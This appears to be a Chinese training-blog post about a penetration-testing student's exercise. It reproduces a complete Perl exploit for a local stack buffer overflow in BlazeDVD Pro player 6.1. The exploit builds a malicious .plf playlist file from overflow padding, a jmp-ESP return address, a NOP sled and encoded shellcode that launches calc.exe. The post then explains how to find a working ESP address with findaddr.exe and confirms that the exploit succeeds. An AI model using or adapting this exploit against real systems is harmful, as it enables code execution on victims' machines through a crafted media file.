学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出利用

学员渗透录十九 BlazeDVD Pro player 6.1缓冲区溢出使用

作者：新月

依旧是我们的新月的新作，以下就我们来围观，看整人。

惯例AD(学渗透找暗月，学代码审计，找暗月，最近在筹办第四季度，有什么好的建议也可以留言咯)

以下是正文：

朋友发来个一个播放器的exp

http://www.exploit-db.com/exploits/26889/

#!/usr/bin/perl   # BlazeDVD Pro player 6.1  Local stack based buffer overflow # Author: PuN1sh3r # Email: [email protected] # Date: Mon Jul 15 03:01:37 EDT 2013 # Vendor link: http://www.blazevideo.com/download.htmm # Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro # App Version: 6.1 # Tested on: Windows 2003 server sp1(EN) # special thanks to corelanc0d3r for his amazing tutorials     $file = "blazeExpl.plf"; $junk = "/x41" x 260; $eip = "/x33/xFE/xE4/x77"; #jmp ESP on kernel32.dll   #msf win/exec calc.exe [*] x86/alpha_mixed $shellcode = "/x89/xe7/xda/xd4/xd9/x77/xf4/x5b/x53/x59/x49/x49/x49/x49" . "/x49/x49/x49/x49/x49/x49/x43/x43/x43/x43/x43/x43/x37/x51" . "/x5a/x6a/x41/x58/x50/x30/x41/x30/x41/x6b/x41/x41/x51/x32" . "/x41/x42/x32/x42/x42/x30/x42/x42/x41/x42/x58/x50/x38/x41" . "/x42/x75/x4a/x49/x49/x6c/x78/x68/x4d/x59/x67/x70/x77/x70" . "/x43/x30/x65/x30/x6b/x39/x5a/x45/x76/x51/x59/x42/x52/x44" . "/x6e/x6b/x71/x42/x46/x50/x6e/x6b/x56/x32/x36/x6c/x4e/x6b" . "/x53/x62/x66/x74/x6c/x4b/x33/x42/x36/x48/x34/x4f/x6f/x47" . "/x51/x5a/x75/x76/x75/x61/x39/x6f/x45/x61/x79/x50/x6c/x6c" . "/x67/x4c/x70/x61/x53/x4c/x66/x62/x36/x4c/x57/x50/x5a/x61" . "/x7a/x6f/x46/x6d/x63/x31/x5a/x67/x4a/x42/x4a/x50/x72/x72" . "/x33/x67/x6c/x4b/x76/x32/x76/x70/x6c/x4b/x53/x72/x35/x6c" . "/x46/x61/x4a/x70/x6e/x6b/x31/x50/x50/x78/x6b/x35/x39/x50" . "/x54/x34/x62/x6a/x67/x71/x4e/x30/x30/x50/x6c/x4b/x52/x68" . "/x35/x48/x6e/x6b/x70/x58/x51/x30/x43/x31/x6a/x73/x5a/x43" . "/x55/x6c/x43/x79/x6c/x4b/x37/x44/x4c/x4b/x37/x71/x69/x46" . "/x36/x51/x39/x6f/x46/x51/x4f/x30/x4e/x4c/x4f/x31/x5a/x6f" . "/x64/x4d/x37/x71/x5a/x67/x46/x58/x79/x70/x43/x45/x4b/x44" . "/x77/x73/x31/x6d/x4b/x48/x47/x4b/x51/x6d/x46/x44/x50/x75" . "/x39/x72/x30/x58/x6c/x4b/x53/x68/x75/x74/x35/x51/x59/x43" . "/x65/x36/x6c/x4b/x36/x6c/x52/x6b/x6e/x6b/x42/x78/x47/x6c" . "/x63/x31/x48/x53/x6e/x6b/x63/x34/x4e/x6b/x56/x61/x7a/x70" . "/x6c/x49/x73/x74/x34/x64/x56/x44/x63/x6b/x53/x6b/x43/x51" . "/x61/x49/x43/x6a/x66/x31/x4b/x4f/x4b/x50/x31/x48/x71/x4f" . "/x33/x6a/x6c/x4b/x32/x32/x48/x6b/x6e/x66/x31/x4d/x51/x7a" . "/x76/x61/x6c/x4d/x6e/x65/x4f/x49/x37/x70/x67/x70/x63/x30" . "/x72/x70/x70/x68/x44/x71/x4e/x6b/x32/x4f/x6b/x37/x39/x6f" . "/x38/x55/x4f/x4b/x7a/x50/x6d/x65/x6c/x62/x70/x56/x55/x38" . "/x6f/x56/x4d/x45/x6d/x6d/x6f/x6d/x39/x6f/x4b/x65/x55/x6c" . "/x74/x46/x63/x4c/x55/x5a/x6d/x50/x49/x6b/x6b/x50/x64/x35" . "/x67/x75/x6f/x4b/x72/x67/x57/x63/x71/x62/x62/x4f/x30/x6a" . "/x57/x70/x36/x33/x69/x6f/x68/x55/x73/x53/x61/x71/x72/x4c" . "/x30/x63/x44/x6e/x70/x65/x32/x58/x32/x45/x65/x50/x41/x41"; $junk .= $eip . "/x90" x 50 . $shellcode ; ############################################################### open(FILE,">$file"); print FILE $junk; close(FILE); ###############################################################

测试一下

先用这个exp生成一个漏洞文件

运行

生成

然后用播放器打开这个文件

因为系统版本不同esp的地址也就不同

我们更改一下exp中esp的地址就可以了

我们用findaddr.exe这个工具搜索系统中的esp地址

使用方法

findaddr kernel32.dll esp

[+]Scanning kernel32.dll for code useable with the esp register

[+]0x7c82385d   call esp

[+]Finished Scanning kernel32.dll for code useable with the esp register

[+]Found 1 usable addresses

Esp地址 0x7c82385d

再用播放器打开

成功弹出，O(∩_∩)O

暗月：缓冲区溢出就是这么的屌。